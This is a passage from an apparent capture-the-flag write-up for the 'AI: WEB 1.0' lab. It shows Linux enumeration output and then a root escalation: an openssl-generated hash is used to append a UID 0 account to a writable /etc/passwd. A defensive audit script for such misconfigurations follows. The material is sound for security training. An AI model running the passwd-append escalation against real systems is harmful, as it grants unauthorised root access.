-rw-r–r– 1 root root 442 Jan 28 2018 shutdown.target
-rw-r–r– 1 root root 402 Jan 28 2018 sigpwr.target
-rw-r–r– 1 root root 460 Jan 28 2018 sleep.target
-rw-r–r– 1 root root 449 Jan 28 2018 slices.target
-rw-r–r– 1 root root 420 Jan 28 2018 smartcard.target
-rw-r–r– 1 root root 396 Jan 28 2018 sockets.target
-rw-r–r– 1 root root 420 Jan 28 2018 sound.target
-rw-r–r– 1 root root 503 Jan 28 2018 suspend.target
-rw-r–r– 1 root root 393 Jan 28 2018 swap.target
-rw-r–r– 1 root root 795 Jan 28 2018 sys-fs-fuse-connections.mount
-rw-r–r– 1 root root 767 Jan 28 2018 sys-kernel-config.mount
-rw-r–r– 1 root root 710 Jan 28 2018 sys-kernel-debug.mount
-rw-r–r– 1 root root 558 Jan 28 2018 sysinit.target
-rw-r–r– 1 root root 1.4K Jan 28 2018 syslog.socket
-rw-r–r– 1 root root 592 Jan 28 2018 system-update.target
-rw-r–r– 1 root root 445 Jan 28 2018 system.slice
-rw-r–r– 1 root root 704 Jan 28 2018 systemd-ask-password-console.path
-rw-r–r– 1 root root 632 Jan 28 2018 systemd-ask-password-wall.path
-rw-r–r– 1 root root 564 Jan 28 2018 systemd-initctl.socket
-rw-r–r– 1 root root 1.2K Jan 28 2018 systemd-journald-dev-log.socket
-rw-r–r– 1 root root 882 Jan 28 2018 systemd-journald.socket
-rw-r–r– 1 root root 631 Jan 28 2018 systemd-networkd.socket
-rw-r–r– 1 root root 657 Jan 28 2018 systemd-rfkill.socket
-rw-r–r– 1 root root 490 Jan 28 2018 systemd-tmpfiles-clean.timer
-rw-r–r– 1 root root 635 Jan 28 2018 systemd-udevd-control.socket
-rw-r–r– 1 root root 610 Jan 28 2018 systemd-udevd-kernel.socket
-rw-r–r– 1 root root 435 Jan 28 2018 time-sync.target
-rw-r–r– 1 root root 445 Jan 28 2018 timers.target
-rw-r–r– 1 root root 457 Jan 28 2018 umount.target
-rw-r–r– 1 root root 432 Jan 28 2018 user.slice
-rw-r–r– 1 root root 493 Jan 25 2018 ssh.service
-rw-r–r– 1 root root 244 Jan 25 2018 ssh@.service
lrwxrwxrwx 1 root root 9 Jan 18 2018 sudo.service -> /dev/null
-rw-r–r– 1 root root 155 Jan 17 2018 phpsessionclean.service
-rw-r–r– 1 root root 144 Jan 17 2018 phpsessionclean.timer
-rw-r–r– 1 root root 216 Jan 16 2018 ssh.socket
-rw-r–r– 1 root root 462 Jan 15 2018 mysql.service
-rw-r–r– 1 root root 741 Dec 18 2017 accounts-daemon.service
-rw-r–r– 1 root root 246 Nov 20 2017 apport-forward.socket
-rw-r–r– 1 root root 142 Nov 20 2017 apport-forward@.service
-rw-r–r– 1 root root 251 Nov 16 2017 cron.service
-rw-r–r– 1 root root 266 Aug 15 2017 ufw.service
-rw-r–r– 1 root root 115 Apr 22 2017 acpid.path
-rw-r–r– 1 root root 234 Apr 22 2017 acpid.service
-rw-r–r– 1 root root 115 Apr 22 2017 acpid.socket
-rw-r–r– 1 root root 188 Feb 24 2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r–r– 1 root root 42 Jul 16 18:14 apache2-systemd.conf

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Jul 22 16:45 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Jul 22 16:45 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Jul 22 16:45 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Jul 22 16:45 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Jul 22 16:45 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Jul 22 16:45 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jun 10 18:05 dbus.socket -> ../dbus.socket

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Jul 22 16:45 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Jul 22 16:45 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Jul 22 16:45 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Jul 22 16:45 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Jul 22 16:45 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Jul 22 16:45 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Jul 22 16:45 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Jul 22 16:45 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Jul 22 16:45 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Jul 22 16:45 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Jul 22 16:45 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Jul 22 16:45 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Jul 22 16:45 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Jul 22 16:45 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Jul 22 16:45 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Jul 22 16:45 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Jul 22 16:45 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Jul 22 16:45 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Jul 22 16:45 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Jul 22 16:45 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Jul 22 16:45 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Jul 22 16:45 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 Apr 4 15:41 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 Apr 4 15:41 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jul 22 16:45 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jul 22 16:45 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Jul 22 16:45 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Jul 22 16:45 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Jul 22 16:45 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Jul 22 16:45 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Jul 22 16:45 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Jul 22 16:45 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jun 10 18:05 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 29 Apr 4 15:41 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 Apr 4 15:41 plymouth-quit.service -> ../plymouth-quit.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jul 22 16:45 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Jul 22 16:45 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/user@.service.d:
total 4.0K
-rw-r–r– 1 root root 125 Jul 22 16:45 timeout.conf

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r–r– 1 root root 290 Jul 22 16:45 debian.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Apr 4 15:41 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 4 15:41 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Apr 4 15:41 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 4 15:41 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 28 Apr 4 15:41 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 26 Apr 4 15:41 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/network:
total 16K
-rw-r–r– 1 root root 645 Jan 28 2018 80-container-host0.network
-rw-r–r– 1 root root 718 Jan 28 2018 80-container-ve.network
-rw-r–r– 1 root root 704 Jan 28 2018 80-container-vz.network
-rw-r–r– 1 root root 412 Jan 28 2018 99-default.link

/lib/systemd/system-generators:
total 240K
-rwxr-xr-x 1 root root 23K Jul 22 16:45 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-debug-generator
-rwxr-xr-x 1 root root 31K Jul 22 16:45 systemd-fstab-generator
-rwxr-xr-x 1 root root 14K Jul 22 16:45 systemd-getty-generator
-rwxr-xr-x 1 root root 26K Jul 22 16:45 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-rc-local-generator
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-system-update-generator
-rwxr-xr-x 1 root root 31K Jul 22 16:45 systemd-sysv-generator
-rwxr-xr-x 1 root root 14K Jul 22 16:45 systemd-veritysetup-generator
-rwxr-xr-x 1 root root 286 Jun 21 14:07 friendly-recovery
-rwxr-xr-x 1 root root 19K Jun 5 06:41 snapd-generator
-rwxr-xr-x 1 root root 11K Jun 4 09:59 lvm2-activation-generator
-rwxr-xr-x 1 root root 4.8K May 11 05:17 cloud-init-generator
lrwxrwxrwx 1 root root 22 May 9 17:11 netplan -> ../../netplan/generate

/lib/systemd/system-preset:
total 4.0K
-rw-r–r– 1 root root 951 Jan 28 2018 90-systemd.preset

/lib/systemd/system-sleep:
total 8.0K
-rwxr-xr-x 1 root root 219 Apr 29 10:13 unattended-upgrades
-rwxr-xr-x 1 root root 92 Feb 22 2018 hdparm

/lib/systemd/system-shutdown:
total 4.0K
-rwxr-xr-x 1 root root 160 Apr 10 14:14 mdadm.shutdown

### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.21p2

[-] MYSQL version:
mysql Ver 14.14 Distrib 5.7.27, for Linux (x86_64) using EditLine wrapper

[-] Apache version:
Server version: Apache/2.4.29 (Ubuntu)
Server built: 2019-08-26T13:41:23

[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
headers_module (shared)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
reqtimeout_module (shared)
setenvif_module (shared)
status_module (shared)

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl

[-] Can we read/write sensitive files:
-rw-r--r-- 1 www-data www-data 1664 Aug 21 09:19 /etc/passwd
-rw-r--r-- 1 root root 747 Aug 20 12:51 /etc/group
-rw-r--r-- 1 root root 581 Apr 9 2018 /etc/profile
-rw-r----- 1 root shadow 1181 Aug 20 13:27 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 40152 May 15 20:43 /snap/core/7270/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/7270/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/7270/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25 12:09 /snap/core/7270/bin/su
-rwsr-xr-x 1 root root 27608 May 15 20:43 /snap/core/7270/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25 12:09 /snap/core/7270/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25 12:09 /snap/core/7270/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25 12:09 /snap/core/7270/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25 12:09 /snap/core/7270/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25 12:09 /snap/core/7270/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10 22:53 /snap/core/7270/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 19:46 /snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 4 14:09 /snap/core/7270/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 102600 Jun 21 07:31 /snap/core/7270/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/7270/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 May 15 20:43 /snap/core/7396/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/7396/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/7396/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25 12:09 /snap/core/7396/bin/su
-rwsr-xr-x 1 root root 27608 May 15 20:43 /snap/core/7396/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25 12:09 /snap/core/7396/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25 12:09 /snap/core/7396/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25 12:09 /snap/core/7396/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25 12:09 /snap/core/7396/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25 12:09 /snap/core/7396/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10 22:53 /snap/core/7396/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 19:46 /snap/core/7396/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 4 14:09 /snap/core/7396/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Jul 12 08:55 /snap/core/7396/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/7396/usr/sbin/pppd
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-sr-x 1 root root 105336 Jun 5 06:41 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14328 Mar 27 13:57 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jun 10 18:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 12:17 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 76496 Mar 22 19:05 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Mar 22 19:05 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 37136 Mar 22 19:05 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 40344 Mar 22 19:05 /usr/bin/newgrp
-rwsr-xr-x 1 root root 37136 Mar 22 19:05 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 22520 Mar 27 13:57 /usr/bin/pkexec
-rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 59640 Mar 22 19:05 /usr/bin/passwd
-rwsr-xr-x 1 root root 18448 Jun 28 11:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 44528 Mar 22 19:05 /usr/bin/chsh
-rwsr-xr-x 1 root root 44664 Mar 22 19:05 /bin/su
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 11:05 /bin/ping
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount

[-] SGID files:
-rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /snap/core/7270/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /snap/core/7270/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 62336 Mar 25 12:09 /snap/core/7270/usr/bin/chage
-rwxr-sr-x 1 root systemd-network 36080 Apr 5 2016 /snap/core/7270/usr/bin/crontab
-rwxr-sr-x 1 root mail 14856 Dec 7 2013 /snap/core/7270/usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 22768 Mar 25 12:09 /snap/core/7270/usr/bin/expiry
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7270/usr/bin/mail-lock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7270/usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7270/usr/bin/mail-unlock
-rwxr-sr-x 1 root crontab 358624 Mar 4 14:09 /snap/core/7270/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 27368 May 15 20:43 /snap/core/7270/usr/bin/wall
-rwsr-sr-x 1 root root 102600 Jun 21 07:31 /snap/core/7270/usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /snap/core/7396/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /snap/core/7396/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 62336 Mar 25 12:09 /snap/core/7396/usr/bin/chage
-rwxr-sr-x 1 root systemd-network 36080 Apr 5 2016 /snap/core/7396/usr/bin/crontab
-rwxr-sr-x 1 root mail 14856 Dec 7 2013 /snap/core/7396/usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 22768 Mar 25 12:09 /snap/core/7396/usr/bin/expiry
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7396/usr/bin/mail-lock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7396/usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7396/usr/bin/mail-unlock
-rwxr-sr-x 1 root crontab 358624 Mar 4 14:09 /snap/core/7396/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 27368 May 15 20:43 /snap/core/7396/usr/bin/wall
-rwsr-sr-x 1 root root 106696 Jul 12 08:55 /snap/core/7396/usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwsr-sr-x 1 root root 105336 Jun 5 06:41 /usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 362640 Mar 4 12:17 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 71816 Mar 22 19:05 /usr/bin/chage
-rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwxr-sr-x 1 root tty 30800 Oct 15 2018 /usr/bin/wall
-rwxr-sr-x 1 root shadow 22808 Mar 22 19:05 /usr/bin/expiry

[+] Files with POSIX capabilities set:
/usr/bin/mtr-packet = cap_net_raw+ep

[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 2683 Jan 17 2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 144 Aug 20 05:07 /etc/kernel-img.conf
-rw-r--r-- 1 root root 2584 Feb 1 2018 /etc/gai.conf
-rw-r--r-- 1 root root 1260 Feb 26 2018 /etc/ucf.conf
-rw-r--r-- 1 root root 1358 Jan 30 2018 /etc/rsyslog.conf
-rw-r--r-- 1 root root 403 Mar 1 2018 /etc/updatedb.conf
-rw-r--r-- 1 root root 4861 Feb 22 2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 6920 Sep 20 2018 /etc/overlayroot.conf
-rw-r--r-- 1 root root 3028 Aug 5 19:23 /etc/adduser.conf
-rw-r--r-- 1 root root 552 Apr 4 2018 /etc/pam.conf
-rw-r--r-- 1 root root 513 Aug 5 19:23 /etc/nsswitch.conf
-rw-r--r-- 1 root root 100 Jun 25 2018 /etc/sos.conf
-rw-r--r-- 1 root root 92 Apr 9 2018 /etc/host.conf
-rw-r--r-- 1 root root 14867 Oct 13 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 5898 Aug 5 19:23 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 604 Aug 13 2017 /etc/deluser.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 703 Aug 21 2017 /etc/logrotate.conf
-rw-r--r-- 1 root root 350 Aug 5 19:24 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 2969 Feb 28 2018 /etc/debconf.conf
-rw-r--r-- 1 root root 812 Mar 24 2018 /etc/mke2fs.conf
-rw-r--r-- 1 root root 191 Feb 7 2018 /etc/libaudit.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf

[-] Location and contents (if accessible) of .bash_history file(s):
/home/aiweb1/.bash_history

[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Aug 5 19:22 .
drwxr-xr-x 14 root root 4096 Aug 20 06:22 ..

### SCAN COMPLETE ####################################

On another terminal, generate an MD5-crypt (-1) hash of the password pass123 with the salt user3:

root@kali:~/Downloads# openssl passwd -1 -salt user3 pass123
$1$user3$rAGRVf5p2jYTqtqOW5cPu/

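Back in the www-data shell, append a new entry with UID 0 and GID 0 to /etc/passwd using that hash. The append succeeds as www-data, which means /etc/passwd is writable by that user on this machine:

www-data@aiweb1:/tmp$ echo 'raj:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash' >>/etc/passwd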

www-data@aiweb1:/tmp$ tail /etc/passwd

www-data@aiweb1:/tmp$ su raj

password : pass123

root@aiweb1:/tmp# cd /root

root@aiweb1:~# ls

root@aiweb1:~# cat flag.txt
cat flag.txt
####################################################
# #
# AI: WEB 1.0 #
# #
# Congratulation!!! #
# #
# Thank you for penetrate my system. #
# #
# Hope you enjoyed this. #
# #
# #
# flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71} #
# #
####################################################
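
A defensive counterpart to the /etc/passwd step above, as an added example that is not part of the original write-up: a POSIX shell check that flags a passwd file writable by group or others, any UID 0 account other than root, and any entry with a hash or an empty value in the password field. The sample file is constructed (its raj line is the one appended above) and the function names write_sample and audit_passwd are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a passwd-format file.

# Constructed sample: three ordinary entries plus the line appended above.
write_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
aiweb1:x:1000:1000::/home/aiweb1:/bin/bash
raj:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash
EOF
}

# Prints one finding per line; returns 0 if the file is clean, 1 otherwise.
audit_passwd() {
    file=$1
    out=$(
        # Only the owner (root on a real host) should be able to modify it.
        if [ -n "$(find "$file" \( -perm -020 -o -perm -002 \))" ]; then
            echo "writable-by-group-or-other: $file"
        fi
        awk -F: '
            /^#/ || NF == 0 { next }      # skip comments and blank lines
            $3 ~ /^0+$/ && $1 != "root" { print "uid0-account: " $1 }
            $2 ~ /^\$/                  { print "inline-hash: " $1 }
            $2 == ""                    { print "empty-password: " $1 }
        ' "$file"
    )
    if [ -z "$out" ]; then
        return 0
    fi
    printf '%s\n' "$out"
    return 1
}

# Demo on the constructed sample; on a real host run: audit_passwd /etc/passwd
sample=$(mktemp)
write_sample "$sample"
chmod 666 "$sample"   # simulate the misconfigured permissions
audit_passwd "$sample" || echo "=> findings above need review"
rm -f "$sample"
```

On a correctly configured host /etc/passwd is mode 644 and owned by root, every password field is x, and root is the only UID 0 entry, so the function prints nothing and returns 0.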

@SAKSHAM DIXIT